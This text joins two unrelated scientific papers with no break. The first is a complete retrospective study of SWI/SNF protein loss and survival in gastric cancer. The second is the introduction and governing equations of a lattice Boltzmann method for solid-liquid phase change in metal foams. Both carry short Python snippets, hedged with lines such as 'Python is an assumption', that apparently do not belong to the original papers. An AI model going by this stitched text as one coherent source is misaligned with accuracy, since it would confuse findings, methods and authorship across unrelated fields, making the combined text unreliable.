SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 are subunits of the Switch/Sucrose non-fermenting (SWI/SNF) complex, which show frequent alterations in rhabdoid tumors, ovarian clear cell carcinomas (OCCCs), and small-cell carcinoma of the ovary, hypercalcemic type (SCCOHT) [17,18]. Numerous studies have demonstrated that this complex plays a role in tumor suppression in human cancers. Mutations or deficiencies of one or more subunits can have an oncogenic effect and influence the development, progression, and eventual therapy resistance of tumor diseases [18][19][20]. A few studies have also demonstrated loss or heterogeneous expression patterns of these subunits in gastric carcinoma, which could make them potential starting points for new therapeutic concepts [21][22][23][24][25].
The aim of this retrospective study was to determine whether and to what extent molecular aberrations of SWI/SNF complex subunits play a role in gastric cancer in a large Western cohort. For this purpose, we evaluated the frequency, association with clinicopathological characteristics, and prognosis of alterations in SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 in 477 carcinomas of the stomach and gastroesophageal junction. In addition, association with the subgroups of the molecular TCGA classification was investigated. Furthermore, determination of SWI/SNF status was reduced to SMARCA2, SMARCA4, SMARCB1, and ARID1A expression to facilitate applicability in routine diagnostics.
Patients
Surgical resection specimens from 511 patients with adenocarcinomas of the stomach and the gastroesophageal junction that were treated between 2005 and 2018 at the Department of Visceral Surgery of the University Hospital Augsburg were included in the study (AEGII and III according to Siewert and Stein [26]). Tumors from 34 patients were excluded from the study, because of low tumor percentage on the tissue microarray (TMA) and the final cohort consisted of 477 tumors. Of these, 347 tumors were treated with surgery alone, and 130 patients received neoadjuvant chemotherapy. Detailed clinical characteristics are summarized in Table 1. Response to preoperative chemotherapy was determined histopathologically and was classified into three tumor regression grades (TRGs): TRG1b, TRG2, and TRG3, which corresponded to <10%, 10-50%, and >50% residual tumor cells [27]. Patients with TRG1b were classified as responders and with TRG2 and TRG3 as non-responders. Patients were treated with platinum/5-fluorouracil (5FU)-based chemotherapeutic regimes (Table 1). All surgical approaches included an abdominal D2-lymphadenectomy [28].
Follow-up data were obtained from the tumor data management of the University Hospital of Augsburg. Median follow-up was calculated by the inverse Kaplan-Meier method [29]. The primary endpoint of the study was overall survival (OS), which was defined as the time between the date of diagnosis and death by any cause.
The study was approved by the Institutional Review Board at the Ludwig-Maximilians-University of Munich (reference: 20-0922) and was performed in accordance with the Declaration of Helsinki.
Tissue Microarray Construction
All eligible histological sections were first re-evaluated using a light microscope (Olympus, Shinjuku, Japan) to verify the diagnosis. Representative slides of each tumor were digitalized using a Pannoramic SCAN II scanner (3DHISTECH, Budapest, Hungary), and five areas, consisting of normal tissue (1×), central tumor (2×), and tumor invasion front (2×), were selected. Based on the marked areas, formalin-fixed, paraffin-embedded (FFPE) tumor samples were subsequently automatically assembled into a tissue microarray (TMA) using a TMA Grandmaster (3DHISTECH, Budapest, Hungary) with a core size of 1 mm.
Immunohistochemistry and In Situ Hybridization
Immunohistochemical staining was performed on 2 µm sections from each TMA using the primary antibodies listed in Supplementary Table S1. For PMS2, E-cadherin, CK7, CK20, CDX2, and EMA, a Ventana BenchMark ULTRA platform with an iVIEW DAB detection system was used (Roche, Mannheim, Germany). Staining for p53, SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, PBRM1, and MSH6 was performed on a BOND Rx platform with a BOND Polymer Refine Detection kit (Leica Biosystems, Nussloch, Germany). EBV-positive (EBV+) cases were identified by chromogenic in situ hybridization (EBER-CISH), likewise on the Ventana BenchMark ULTRA platform (Roche, Mannheim, Germany). Adequate controls were used for quality control of staining.
The stained sections were again digitalized, and the evaluation was performed with 3DHISTECH CaseViewer (3DHISTECH, Budapest, Hungary) by one pathologist (Bianca Grosser) and one trained researcher (Marie-Isabelle Glückstein). Discrepant cases were discussed with a senior pathologist (Bruno Märkl), and a consensus was established. The investigators were blinded both to the clinicopathological data and to the outcome.
Immunohistochemical expression of SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 was classified as retained, reduced, loss, or hybrid-loss [21]. A strong homogeneous nuclear staining of non-neoplastic cells served as internal control. Reduced expression was defined as homogenous, very weak, but still recognizable, staining compared to normal cells. Tumors with hybrid loss showed loss of expression only in a subset of cells. Specimens lacking strong staining in the background of normal cells were not assessed [21,30].
TCGA Classification
Tumors were classified in analogy to TCGA-classification [10] as proposed by Setia et al. and Ahn et al. [31,32] in EBV + , mismatch repair deficient (MMRD), genomically stable (GS), and chromosomally instable (CIN) cases. Cases that showed nuclear staining by EBER-CISH were considered EBV + . The presence of MMRD was stated in case of loss of nuclear expression of MSH6 or PMS2. GS cases were identified according to aberrant E-cadherin expression. E-cadherin was considered positive if membranous staining was present in more than 50% of tumor cells [33]. Tumors were classified as CIN if an aberrant p53 expression pattern was present. p53 expression was considered aberrant if tumor cells showed complete loss of nuclear expression or if they showed staining with strong intensity in more than 60%. Staining of less than 60% with weak to moderate intensity was considered a wild-type expression pattern [34,35]. Cases that did not meet the above criteria were designated as unclassifiable.
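As a hedged illustration only, the hierarchical decision rules described above can be summarized in a short function. Python and the variable names are assumptions, and the rule order (EBV+ before MMRD before GS before CIN) follows the usual surrogate hierarchy rather than an explicit statement in the text.

```python
def classify_tcga(ebv_cish_pos, msh6_loss, pms2_loss,
                  ecad_membranous_pct, p53_loss, p53_strong_pct):
    """Surrogate TCGA classification of a gastric carcinoma, following the
    immunohistochemical criteria quoted in the text."""
    if ebv_cish_pos:                       # nuclear EBER-CISH staining
        return "EBV+"
    if msh6_loss or pms2_loss:             # loss of nuclear MMR expression
        return "MMRD"
    if ecad_membranous_pct <= 50:          # aberrant E-cadherin -> GS
        return "GS"
    # aberrant p53: complete loss, or strong staining in >60% of tumor cells
    if p53_loss or p53_strong_pct > 60:
        return "CIN"
    return "unclassifiable"
```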
Statistical Analysis
Chi-squared tests were used for hypothesis testing of differences between the relative frequencies. Kaplan-Meier estimates of survival rates were compared by log rank tests. Relative risks were estimated by hazard ratios (HR) from Cox proportional hazard models. Statistical analyses were performed using SPSS, Version 24 (IBM Corp., Armonk, NY, USA) and R Version 4.0.3. Exploratory 5% significance levels (two-tailed) were used for hypothesis testing.
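To illustrate the analysis pipeline, a minimal sketch using the open-source lifelines package is shown below. The file name and column names are hypothetical, and the covariates are placeholders rather than the exact Cox model of Table 2.

```python
import pandas as pd
from lifelines import CoxPHFitter
from lifelines.statistics import logrank_test

# Hypothetical columns: os_months, death (1 = event), swisnf_ab (1 = aberrant),
# plus covariates such as pT and pN stage.
df = pd.read_csv("gs_subgroup.csv")  # assumed file of GS-subtype patients

# log-rank comparison of SWI/SNF-aberrant vs. intact tumors
ab, it = df[df.swisnf_ab == 1], df[df.swisnf_ab == 0]
result = logrank_test(ab.os_months, it.os_months,
                      event_observed_A=ab.death, event_observed_B=it.death)
print(result.p_value)

# multivariable Cox model estimating the hazard ratio for SWI/SNF aberration
cph = CoxPHFitter()
cph.fit(df[["os_months", "death", "swisnf_ab", "pt_stage", "pn_stage"]],
        duration_col="os_months", event_col="death")
cph.print_summary()
```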
Cohort
The final cohort consisted of 477 patients with adenocarcinoma of the stomach or the gastroesophageal junction (Table 1). Of these, 130 patients received neoadjuvant chemotherapy and 347 underwent primary resection. The mean age of the cohort was 70.0 (range: 30.0-95.0) years, and the median follow-up was 58.0 (range: 49.9-66.1) months; 52% of patients died during the follow-up period. Detailed clinicopathological characteristics are shown in Table 1.
SMARCA4 Expression
Analyses showed complete loss of SMARCA4 expression in three cases (0.6%). All three tumors showed an anaplastic, solid and rhabdoid growth pattern (Figure 1), advanced T-stages, and lymph node and liver metastases. The median survival was eight (range: 7-12) months. Two patients received neoadjuvant chemotherapy and showed no response (TRG3). Two cases were subclassified as GS and one as CIN in analogy to the TCGA classification. All three cases were localized at the gastroesophageal junction (AEGII). Seven additional tumors (1.4%) showed reduced SMARCA4 expression. In all three cases with SMARCA4 loss, the expression of ARID1A and SMARCB1 was intact, whereas SMARCA2 was reduced in two of them and completely lost in the remaining one. In one case, tumor cells were negative for both CK7 and CK20, whereas vimentin was expressed with a distinct perinuclear dot-like pattern. In addition, there was no expression of CDX2, and EMA was expressed in all three cases with SMARCA4 loss.
SMARCA2, SMARCB1, and ARID1A Expression
Complete loss of ARID1A was observed in 59 (12.5%) and reduced expression in 11 (2.3%) cases. SMARCA2 expression was lost in 25 (5.4%) tumors and reduced in 65 (13.9%) cases. No case showed complete loss of SMARCB1; however, a heterogeneous expression pattern was detected in one case (0.2%), and five cases (1.1%) showed reduced expression. Complete loss occurred in 26 cases (5.5%) for PBRM1 and in nine cases (1.9%) for ARID1B. Because both PBRM1 (31.4%) and ARID1B (49.8%) showed a very high proportion of cases with reduced expression, only cases with complete loss were designated as aberrant when determining the SWI/SNF status. Representative images of aberrant expression patterns are shown in Figure 2A-K, and images of all cases with complete loss are presented in Supplementary Figure S1. Retained expression patterns of the proteins are shown in Figure 2M-R.
As shown in Figure 2L, the largest overlap of aberrant expression can be seen between aberrant expression of SMARCA2 and ARID1A in 26 cases. One case showed simultaneous aberration of SMARCA4, SMARCA2, ARID1B, and PBRM1. No case with aberration of all the proteins involved in the SWI/SNF complex could be detected.
In cases of SMARCA2 loss, parallel loss of ARID1A occurred nine times. Seven of these nine cases showed intestinal type according to Laurén.
SWI/SNF Status, Clinicopathologic Characteristics, and Survival
In the following, patients are classified according to the expression of the SWI/SNF proteins. If any of the proteins SMARCA2, SMARCA4, SMARCB1, or ARID1A showed reduced expression or loss, the case was designated as SWI/SNF-aberrant (SWISNFab). The cases with reduced and lost expression were combined because no survival difference was observed between the two groups (p = 0.452) (Supplementary Figure S3). Only complete loss of PBRM1 or ARID1B expression was considered aberrant.
Cases with SWISNFab were associated with advanced T-stage and MMRD subtype (each p < 0.01) and in CTx patients with low chemotherapy response (p = 0.023). Other associations with clinicopathological characteristics are presented in Table 1.
In the overall cohort, no significant survival difference regarding SWI/SNF status was observed (p = 0.130) (Figure 3A).
In the subgroup analyses, the prognostic effect of SWISNFab was seen especially in tumors that were classified as GS in analogy to the TCGA classification (p = 0.014) (Figure 3B). SWISNFab patients had a median survival of 21.0 (range: 8.5-33.5) months, compared with 46.0 (range: 23.8-68.2) months for cases with intact expression. In Cox regression analysis (Table 2), including known prognostic parameters, SWISNFab emerged as an independent prognostic factor for overall survival (HR 1.90, CI 1.04-3.50, p = 0.039) in GS tumors. In the other subgroups, no survival difference was seen with respect to SWI/SNF status. The corresponding survival curves are presented in Supplementary Figure S3. The SWI/SNF expression status and survival of subgroups according to TCGA can be found in Supplementary Figure S4.
Determination of SWI/SNF Status Using a Focused Panel of Protein Expression
To verify whether it is possible to reduce the panel for determining SWI/SNF status, only aberrant expression of SMARCA2, SMARCA4, SMARCB1, and ARID1A was considered and designated as SWI/SNFfocused. Compared with SWI/SNF status, 18 patients were thus not classified as aberrant ( Figure 2L). With regard to clinicopathologic characteristics, no essential difference was detected between SWI/SNF and SWI/SNFfocused (Supplementary Table S2).
Discussion
To the best of our knowledge, no study has evaluated the clinical relevance of the SWI/SNF complex in a large Western cohort of gastric cancer patients [21][22][23][24]36].
This study addressed this issue and analyzed the clinicopathological and prognostic relevance of the SWI/SNF complex in gastric adenocarcinomas with or without neoadjuvant CTx. We additionally investigated the association of the SWI/SNF complex with molecular subgroups in analogy to the TCGA.
The SWI/SNF complex has important functions in the mobilization of nucleosomes and consequently influences gene expression. Genes encoding subunits of the SWI/SNF complex are mutated in approximately 20% of all human tumors [18][19][20]37]. In our cohort, 32% of cases showed alteration of at least one of the subunits of the SWI/SNF complex, namely SMARCA2, SMARCA4, SMARCB1, ARID1A, PBRM1, and ARID1B.
Alterations of SMARCA4 occur at very low frequencies in solid tumors. We observed loss of SMARCA4 expression in three cases (0.6%); similar frequencies have been observed in other studies of gastric, esophageal, and lung carcinomas [22,24,30,38]. All three tumors with SMARCA4 deficiency showed very similar, specific histopathologic features and were located at the gastroesophageal junction (AEGII). Additionally, they showed very adverse clinical characteristics and poor survival. The specific growth pattern and clinical significance have been described by Agaimy et al. [21] in two cases and by Huang et al. [22] in six cases. As described by Agaimy et al. [21], the expression pattern of cytokeratins differed among the SMARCA4-deficient cases. In cases of SMARCA4 loss, epithelial membrane antigen (EMA) seems to be an adequate marker to prove epithelial differentiation, whereas vimentin showed a typical perinuclear dot-like pattern in only one case [39]. Furthermore, we observed >50% residual tumor (TRG3) in the two cases with SMARCA4 deficiency and preoperative CTx. As in adenocarcinomas of the lung and esophagus, no case with complete loss of SMARCB1 could be detected, suggesting that this subunit of the SWI/SNF complex does not play a major role in gastric carcinomas [24,30,38].
SWI/SNF alteration in at least one subunit was an independent negative prognostic factor for overall survival. This is fully in line with a recently published large Asian gastric cancer cohort study, in which SWI/SNF was altered in 35% of carcinomas and a negative prognostic effect of altered SWI/SNF was seen mainly in non-MSI/EBV diffuse-type gastric carcinomas. Lacking data on the molecular classification, that study could not further subclassify this non-MSI/EBV type [24]. Interestingly, we identified the GS group as the one mainly influenced by alterations of the SWI/SNF complex. The already-poor prognosis of this group, which accounts for 23% of cases in our study, was dramatically worsened in the SWISNFab group, with a median survival time of 21 versus 46 months. In the GS subgroup, 29 (19%) cases showed altered SWI/SNF. In contrast to the Asian study, we did not observe a survival difference in the subgroup analyses according to Laurén subtypes [24]. There might be an overlap with the diffuse type, as 83% of the carcinomas in our GS subgroup were classified as diffuse type. Given the relatively high percentage of SWI/SNF-deficient carcinomas and the poor prognosis, especially in the GS subtype, there is an urgent need for new therapeutic strategies.
For ARID1A-deficient cancer cells, Ogiwara et al. [40] showed that they express low levels of glutathione (GSH), which makes them specifically vulnerable to inhibition of the GSH metabolic pathway. Additionally, increased sensitivity of ARID1A-deficient cancer cells to small-molecule inhibitors of the PI3K/AKT pathway and selective sensitivity of EZH2 inhibitors against ARID1A-deficient gastric cancer have been demonstrated [41][42][43]. The EZH2 inhibitor tazemetostat is currently being investigated in ongoing clinical trials that include SMARCA4-negative solid tumors [18]. The most promising potential therapeutic option so far appears to be sensitivity to agents that induce double-strand DNA breaks, such as PARP inhibitors, because of the impairment of the DNA damage checkpoint [44]; PARP inhibitors are currently being evaluated in several ongoing clinical trials. Furthermore, Shorstova et al. [45] found SWI/SNF-compromised cancers to be susceptible to bromodomain inhibitors. An allosteric inhibitor of SMARCA2 and SMARCA4 has demonstrated anti-proliferative activity in a mouse xenograft model of SMARCA4-mutant lung cancer [20]. Initial studies showed the potential efficacy of checkpoint inhibitors and the promotion of anti-tumor immunity in SWI/SNF-deficient tumors [46,47]. Interestingly, SMARCB1-mutant rhabdoid tumors and SMARCA4-mutant small cell carcinoma of the ovary have an immune-active microenvironment and are responsive to immune-checkpoint inhibition [18,48,49]. We also observed a strong association of SWI/SNF deficiency with the MMRD subtype, for which checkpoint inhibition is already a therapeutic option [50,51].
Determining SWI/SNF status with a reduced panel of proteins proved almost equivalent with regard to prognosis. Especially with a view to possible determination of SWI/SNF status in routine diagnostics, it therefore seems reasonable to limit the assessment in gastric cancer to SMARCA4, SMARCA2, and ARID1A.
Despite the comprehensive analysis of a large cohort, our study has limitations, which are mainly related to its retrospective nature. It has to be considered an exploratory analysis, and the results have to be validated in independent prospective cohorts. To elucidate the underlying molecular mechanisms of the alterations we identified at the protein expression level, sophisticated genetic and epigenetic investigations are necessary.
Conclusions
In summary, the expression of SMARCB1 does not appear to be of major importance in gastric carcinoma. The determination of SWI/SNF status with analyses of SMARCA2, SMARCA4, and ARID1A could be considered in routine practice, especially in the GS subgroup according to TCGA, to identify patients who might benefit from new therapeutic alternatives.
Supplementary Materials: The following are available online at https://www.mdpi.com/article/10.3390/cancers13153894/s1, Figure S1: SWI/SNF expression status and survival in subgroups according to TCGA; Figure S2: Kaplan-Meier curves of the patients with aberrant, reduced, and intact expression of ARID1A (A), SMARCA2 (B), SMARCA4 (C), SMARCB1 (D), PBRM1 (E), and ARID1B (F); Figure S3: Survival in cases with complete and reduced expression of SWI/SNFfocused status; Figure S4: SWI/SNF expression status and survival in subgroups according to TCGA; Table S1: Antibodies and dilutions; Table S2: Clinicopathological characteristics and SWI/SNFfocused status; Table S3: Cox regression analysis of SWI/SNFfocused status.

Informed Consent Statement: Patient consent was waived due to the retrospective study type with anonymization of patients.
Data Availability Statement:
The datasets generated during the current work are available from the corresponding author on reasonable request.
An enthalpy-based multiple-relaxation-time lattice Boltzmann method for solid-liquid phase change heat transfer in metal foams
In this paper, an enthalpy-based multiple-relaxation-time (MRT) lattice Boltzmann (LB) method is developed for solid-liquid phase change heat transfer in metal foams under local thermal non-equilibrium (LTNE) condition. The enthalpy-based MRT-LB method consists of three different MRT-LB models: one for flow field based on the generalized non-Darcy model, and the other two for phase change material (PCM) and metal foam temperature fields described by the LTNE model. The moving solid-liquid phase interface is implicitly tracked through the liquid fraction, which is simultaneously obtained when the energy equations of PCM and metal foam are solved. The present method has several distinctive features. First, as compared with previous studies, the present method avoids the iteration procedure, thus it retains the inherent merits of the standard LB method and is superior over the iteration method in terms of accuracy and computational efficiency. Second, a volumetric LB scheme instead of the bounce-back scheme is employed to realize the no-slip velocity condition in the interface and solid phase regions, which is consistent with the actual situation. Last but not least, the MRT collision model is employed, and with additional degrees of freedom, it has the ability to reduce the numerical diffusion across phase interface induced by solid-liquid phase change. Numerical tests demonstrate that the present method can be served as an accurate and efficient numerical tool for studying metal foam enhanced solid-liquid phase change heat transfer in latent heat storage. Finally, comparisons and discussions are made to offer useful information for practical applications of the present method.
I. INTRODUCTION
Over the past three decades, latent heat storage (LHS) using solid-liquid phase change materials (PCMs) has attracted a great deal of attention because it is of great importance for energy saving, efficient and rational utilization of available resources, and optimum utilization of renewable energies [1][2][3][4][5]. Solid-liquid PCMs absorb or release thermal energy by taking advantage of their latent heat (heat of fusion) during solid to liquid or liquid to solid phase change process. PCMs have many desirable properties, such as high energy storage density, nearly constant phase change temperature, small volume change, etc. However, the available PCMs commonly suffer from low thermal conductivities (in the range of 0.2~0.6 W/(m·K) [1]), which prolong the thermal energy charging and discharging period. In order to overcome this limitation and improve the thermal performance of LHS units/systems, a lot of heat transfer enhancement approaches have been developed, among which embedding PCMs in highly conductive porous materials (e.g., metal foams, expanded graphite) to form composite phase change materials (CPCMs) has long been practiced [6]. High porosity open-cell metal foams, as a kind of promising porous materials with high thermal conductivity, large specific surface area, and attractive stiffness/strength properties, have been widely used for LHS applications [7].
With new experimental techniques and advanced instruments, experimental investigations of heat transfer behaviors in porous systems are becoming more accessible, and the problems of solid-liquid phase change heat transfer in metal-foam-based PCMs have been experimentally studied by many researchers [8][9][10][11][12]. In addition to experimental studies, numerical analyses usually play an important role in studying such problems. In the past two decades, numerical investigations have been extensively conducted to study solid-liquid phase change heat transfer in metal foams [13][14][15][16][17][18][19][20][21][22][23]. These numerical investigations provide valuable design guidelines for practical applications of LHS technologies. Since the thermal conductivity of the metal foam is usually two or three orders of magnitude higher than that of the PCM, the thermal non-equilibrium effects between the PCM and metal foam may play a significant role. Therefore, the local thermal non-equilibrium (LTNE) model (also called the two-temperature model) has been widely employed for numerical studies [14][15][16][17][18][19][20][21][22][23]. However, most of the previous numerical studies [13][14][15][16][17][18][19][20] for solid-liquid phase change heat transfer in metal foams were carried out using conventional numerical methods [mainly finite-volume method (FVM)] based on the discretization of the macroscopic continuum equations. In order to get a thorough understanding of the underlying mechanisms, more fundamental approaches should be developed for solid-liquid phase change heat transfer in metal foams.
The lattice Boltzmann (LB) method [24][25][26][27][28], as a mesoscopic numerical method sitting in the intermediate region between microscopic molecular dynamics (MD) and macroscopic continuum-based methods, has achieved great success in simulating fluid flows and modeling physics in fluids since its emergence in 1988 [29][30][31][32][33]. Historically, the LB method originated from the lattice gas automata (LGA) method [34], a simplified, fictitious version of the MD method in which the time, space, and particle velocities are all discrete. Later He and Luo [35,36] demonstrated that the LB equation can be rigorously obtained from the linearized continuous Boltzmann equation of the single-particle distribution function. The establishment of such connection not only makes the LB method more amenable to numerical analysis, but also puts the LB method on the solid theoretical foundation of kinetic theory. From this perspective, the LB method can be viewed as a Boltzmann equation-based mesoscopic method. Between the microscopic MD and macroscopic continuum-based methods, there also exist several other Boltzmann equation-based mesoscopic methods, such as the discrete-velocity method (DVM) [37] and the gas-kinetic scheme (GKS) [38,39], as representatives. Unlike the MD method which takes into account the movements and collisions of all the individual molecules, the LB method considers the behaviors of a collection of pseudo-particles (a pseudo-particle is comprised of a large number of molecules) moving on a regular lattice with particles residing on the nodes. This feature of the LB method is similar to that of the direct simulation Monte Carlo (DSMC) method [40][41][42]. Different from the conventional numerical methods based on a direct discretization of the macroscopic continuum equations, the LB method is based on minimal lattice formulations of the continuous Boltzmann equation for single-particle distribution function, and macroscopic properties can be obtained from the distribution function through moment integrations. As highlighted by Succi [43], the LB method should most appropriately be considered not just as a smart Navier-Stokes solver in disguise, but rather like a fully-fledged modeling strategy for a wide range of complex phenomena and processes across scales.
In recent years, the LB method in conjunction with the enthalpy method has been successfully employed to simulate solid-liquid phase change heat transfer in metal foams [21][22][23]. Gao et al. [21] proposed a thermal LB model to simulate melting process coupled with natural convection in open-cell metal foams under LTNE condition. The influence of foam porosity and pore size on the melting process were investigated and discussed. Subsequently, Gao et al. [22] further developed a thermal LB model for solid-liquid phase change in metal foams under LTNE condition. By appropriately choosing the equilibrium temperature distribution functions and discrete source terms, the energy equations of the PCM and metal foam can be exactly recovered. Most recently, Tao et al. [23] employed an enthalpy-based LB method to study the LHS performance of copper foams/paraffin CPCM. The effects of geometric parameters such as pore density and porosity on PCM melting rate, thermal energy storage capacity and density were investigated.
Up to now, although some progresses have been made in studying solid-liquid phase change heat transfer in metal foams, there are still two key issues remain to be resolved. The first one is to avoid iteration procedure so as to improve the accuracy and computational efficiency. In previous studies [21][22][23], the nonlinear latent heat source term accounting for the phase change is treated as a source term in the LB equation of the PCM temperature field, which makes the explicit time-matching LB equation to be implicit. Therefore, an additional iteration procedure is needed at each time step so that the convergent solution of the implicit LB equation can be obtained, which severely affects the computational efficiency, and the inherent merits of the LB method are lost. The second key issue is to accurately realize the no-slip velocity condition in the interface and solid phase regions. For solid-liquid phase change heat transfer in metal foams, the phase interface is actually a region with a certain thickness because of the interfacial heat transfer between PCM and metal foam [15]. Therefore, the phase interface is usually referred as the interface region or mushy zone. Considering the actual situation of the phase change process, it is not appropriate to use the bounce-back scheme to impose the no-slip velocity condition in the interface region (this point will be demonstrated in Section V B).
In the present study, we aim to develop a novel enthalpy-based LB method for solid-liquid phase change heat transfer in metal foams, in which the above-mentioned key issues will be resolved.
Considering that the multiple-relaxation-time (MRT) collision model [28] is superior to its Bhatnagar-Gross-Krook (BGK) counterpart [27] in simulating solid-liquid phase change heat transfer in metal foams, the MRT collision model is employed in the enthalpy-based LB method; the two collision models are compared in Section V A. The rest of this paper is organized as follows. The macroscopic governing equations are briefly given in Section II. Section III presents the enthalpy-based MRT-LB method in detail. Section IV validates the enthalpy-based MRT-LB method. In Section V, comparisons and discussions are made to offer useful information for practical applications of the present method. Finally, some conclusions are given in Section VI.

II. MACROSCOPIC GOVERNING EQUATIONS

In the physical model, the thermal dispersion effects and surface tension are neglected. To take the non-Darcy effects of inertial and viscous forces into consideration, the flow field is described by the generalized non-Darcy model (also called the Brinkman-Forchheimer extended Darcy model) [44][45][46]. The volume-averaged mass and momentum conservation equations of the generalized non-Darcy model can be written as

$$\nabla \cdot \mathbf{u} = 0, \tag{1}$$

$$\frac{\partial \mathbf{u}}{\partial t} + \left(\mathbf{u}\cdot\nabla\right)\left(\frac{\mathbf{u}}{\phi}\right) = -\frac{1}{\rho_f}\nabla\left(\phi p\right) + \nu_e \nabla^2 \mathbf{u} + \mathbf{F}, \tag{2}$$

where $\rho_f$ is the density of the PCM, $\mathbf{u}$ and $p$ are the volume-averaged velocity and pressure, respectively, $\phi$ is the porosity of the metal foam, $\nu_e$ is the effective kinematic viscosity, and $\mathbf{F}$ is the total body force induced by the porous matrix (metal foam) and other external force fields, which can be expressed as [45,46]

$$\mathbf{F} = -\frac{\phi \nu_f}{K}\mathbf{u} - \frac{\phi F_\phi}{\sqrt{K}}\left|\mathbf{u}\right|\mathbf{u} + \phi\, \mathbf{G}, \tag{3}$$

where $K$ is the permeability, $\nu_f$ is the kinematic viscosity of the PCM ($\nu_f$ is not necessarily the same as $\nu_e$), and $\mathbf{G}$ is the buoyancy force. The inertial coefficient $F_\phi$ (Forchheimer coefficient) and permeability $K$ depend on the geometry of the metal foam. For flow over a packed bed of particles, based on Ergun's experimental investigations [47], $F_\phi$ and $K$ can be expressed as [48]

$$F_\phi = \frac{1.75}{\sqrt{150\,\phi^3}}, \qquad K = \frac{\phi^3 d_p^2}{150\left(1-\phi\right)^2}, \tag{4}$$

where $d_p$ is the solid particle diameter (or mean pore diameter). For the metal foam with $\phi = 0.8$ considered in the present study, $F_\phi$ is set to 0.068 [15,49].
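As a small illustration, the structural relations of Eq. (4) can be evaluated directly; the following is a minimal sketch (Python is an assumption, since the paper specifies no implementation language):

```python
import numpy as np

def ergun_structure(phi, dp):
    """Permeability K and inertial coefficient F_phi from the Ergun-type
    correlations of Eq. (4); dp is the mean pore (particle) diameter."""
    K = phi**3 * dp**2 / (150.0 * (1.0 - phi)**2)
    F_phi = 1.75 / np.sqrt(150.0 * phi**3)
    return K, F_phi
```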
The LTNE model is employed to take into account the temperature difference between the metal foam and the PCM. According to Refs. [15,17,20], the energy equations of the PCM (including liquid and solid phases) and of the metal foam can be written as follows:

$$\phi \rho_f c_{p,f}\frac{\partial T_f}{\partial t} + \rho_f c_{p,f}\,\mathbf{u}\cdot\nabla T_f = \nabla\cdot\left(k_{fe}\nabla T_f\right) + h_v\left(T_m - T_f\right) - \underline{\phi \rho_f L_a \frac{\partial f_l}{\partial t}}, \tag{5}$$

$$\left(1-\phi\right)\rho_m c_m \frac{\partial T_m}{\partial t} = \nabla\cdot\left(k_{me}\nabla T_m\right) - h_v\left(T_m - T_f\right), \tag{6}$$

where $T_f$ and $T_m$ are the temperatures of the PCM and metal foam, respectively, $k_{fe}$ and $k_{me}$ are the corresponding effective thermal conductivities, $h_v$ is the volumetric interfacial heat transfer coefficient, $L_a$ is the latent heat of fusion, and $f_l$ is the liquid fraction. The underlined term in Eq. (5) is the nonlinear latent heat source term accounting for the phase change.
Based on the Boussinesq approximation, the buoyancy force $\mathbf{G}$ in Eq. (3) is given by

$$\mathbf{G} = g\beta\left(T_f - T_0\right)\mathbf{j}, \tag{7}$$

where $g$ is the gravitational acceleration, $\beta$ is the thermal expansion coefficient, $T_0$ is the reference temperature, and $\mathbf{j}$ is the unit vector opposite to gravity. The effective thermal conductivities of the PCM and metal foam are defined by

$$k_{fe} = \phi\, k_f, \qquad k_{me} = \left(1-\phi\right) k_m, \tag{8}$$

respectively. The thermal conductivity and specific heat of the PCM are given as follows:

$$k_f = k_s + f_l\left(k_l - k_s\right), \qquad c_{p,f} = c_{p,s} + f_l\left(c_{p,l} - c_{p,s}\right), \tag{9}$$

where the subscripts $s$ and $l$ denote the solid and liquid phases of the PCM, respectively. Under the local thermal equilibrium (LTE) condition, i.e., $T_f = T_m = T$, the energy equations (5) and (6) can be replaced by the following single-temperature equation [50]:

$$\sigma \frac{\partial T}{\partial t} + \mathbf{u}\cdot\nabla T = \nabla\cdot\left(\alpha_e \nabla T\right) - \frac{\phi L_a}{c_{p,f}}\frac{\partial f_l}{\partial t}, \tag{10}$$

where $\sigma = \left[\phi \rho_f c_{p,f} + \left(1-\phi\right)\rho_m c_m\right]/\left(\rho_f c_{p,f}\right)$ is the thermal capacity ratio and $\alpha_e = \left(k_{fe}+k_{me}\right)/\left(\rho_f c_{p,f}\right)$ is the effective thermal diffusivity.
III. ENTHALPY-BASED MRT-LB METHOD

In what follows, an MRT-LB method in conjunction with the enthalpy method is presented for solid-liquid phase change heat transfer in metal foams under the LTNE condition. The method is constructed in the framework of the triple-distribution-function (TDF) approach: the flow field and the temperature fields of the PCM and metal foam are solved separately by three different MRT-LB models.
For the two-dimensional (2D) problems considered in the present study, the two-dimensional nine-velocity (D2Q9) lattice is employed. The nine discrete velocities $\{\mathbf{e}_i\}$ of the D2Q9 lattice are given by [27]

$$\mathbf{e}_i = \begin{cases} (0,0), & i = 0,\\[2pt] c\left(\cos\left[(i-1)\dfrac{\pi}{2}\right],\, \sin\left[(i-1)\dfrac{\pi}{2}\right]\right), & i = 1\text{-}4,\\[2pt] \sqrt{2}\,c\left(\cos\left[(2i-9)\dfrac{\pi}{4}\right],\, \sin\left[(2i-9)\dfrac{\pi}{4}\right]\right), & i = 5\text{-}8, \end{cases} \tag{11}$$

where $c = \delta_x/\delta_t$ is the lattice speed, with $\delta_t$ and $\delta_x$ being the discrete time step and lattice spacing, respectively.
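For illustration, a minimal NumPy sketch of the D2Q9 velocity set and weights, together with the porosity-scaled equilibrium distribution used later in Section III A, is given below; Python is an assumption and the helper name is hypothetical.

```python
import numpy as np

# D2Q9 discrete velocities e_i (in units of the lattice speed c) and the
# standard weights w_i; i = 0 rest, i = 1-4 axis directions, i = 5-8 diagonals.
e = np.array([[0, 0],
              [1, 0], [0, 1], [-1, 0], [0, -1],
              [1, 1], [-1, 1], [-1, -1], [1, -1]], dtype=int)
w = np.array([4/9] + [1/9]*4 + [1/36]*4)

def feq(rho, u, phi, cs2=1/3):
    """Equilibrium distribution f_i^eq at one node for the generalized
    non-Darcy model: the usual D2Q9 second-order expansion with the
    quadratic velocity terms scaled by the porosity phi."""
    eu = e @ u                              # e_i . u for all i
    uu = u @ u
    return w * rho * (1 + eu/cs2 + eu**2/(2*cs2**2*phi) - uu/(2*cs2*phi))
```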
A. MRT-LB model for flow field
